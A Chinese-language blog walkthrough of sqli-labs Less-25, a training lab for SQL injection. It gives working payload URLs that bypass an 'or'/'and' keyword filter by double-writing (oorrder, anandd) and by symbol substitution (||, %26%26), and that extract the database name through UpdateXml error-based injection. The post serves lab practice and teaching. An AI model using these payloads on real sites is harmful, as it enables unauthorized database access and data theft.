sqli-labs less25 GET- Error based -All you OR&AND belong to us -string single quote(基于错误的去除了or(代

Posted superkrissv

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqli-labs less25 GET- Error based -All you OR&AND belong to us -string single quote(基于错误的去除了or(代相关的知识,希望对你有一定的参考价值。

技术分享图片

加单引号

技术分享图片

order by一下

http://localhost/sqli-labs-master/Less-25/?id=1‘ order by 1%23

技术分享图片

order by 变成了der by

下面的hint也显示了过滤后的字符串,其实直接看报错就可以看出来了,虽然标题是屏蔽了or和and,结果order也被误伤了

由于过滤只是单纯的将or and用空串进行了替换那么构造oorrder by就应该可以通过了

http://localhost/sqli-labs-master/Less-25/?id=1‘ oorrder by 1%23

技术分享图片

union select完全没有过滤

技术分享图片

and绕过

http://localhost/sqli-labs-master/Less-25/?id=1‘ anandd UpdateXml(1,concat(0x7e,database(),0x7e),1)%23

技术分享图片

上面的绕过方式被称为双写绕过,除此之外,还可以用符号绕过

                符号          URL编码

or              ||              %7c%7c

and           &&           %26%26(GET提交必须编码)

http://localhost/sqli-labs-master/Less-25/?id=0‘ || UpdateXml(1,concat(0x7e,database(),0x7e),1)%23
http://localhost/sqli-labs-master/Less-25/?id=1‘ %26%26 UpdateXml(1,concat(0x7e,database(),0x7e),1)%23

 

以上是关于sqli-labs less25 GET- Error based -All you OR&AND belong to us -string single quote(基于错误的去除了or(代的主要内容,如果未能解决你的问题,请参考以下文章

sqli-labs less33 GET- Bypass AddSlashes (GET型绕过addslashes() 函数的宽字节注入)

sqli-labs less2 GET - Error based - Intiger based (基于错误的GET整型注入)

SQL注入SQLi-LABS Page-1(Basic Challenges Less1-Less22)

SQL注入SQLi-LABS Page-1(Basic Challenges Less1-Less22)

SQL注入SQLi-LABS Page-1(Basic Challenges Less1-Less22)

sqli-labs less9 GET - Blind - Time based. - Single Quotes (基于时间的GET单引号盲注)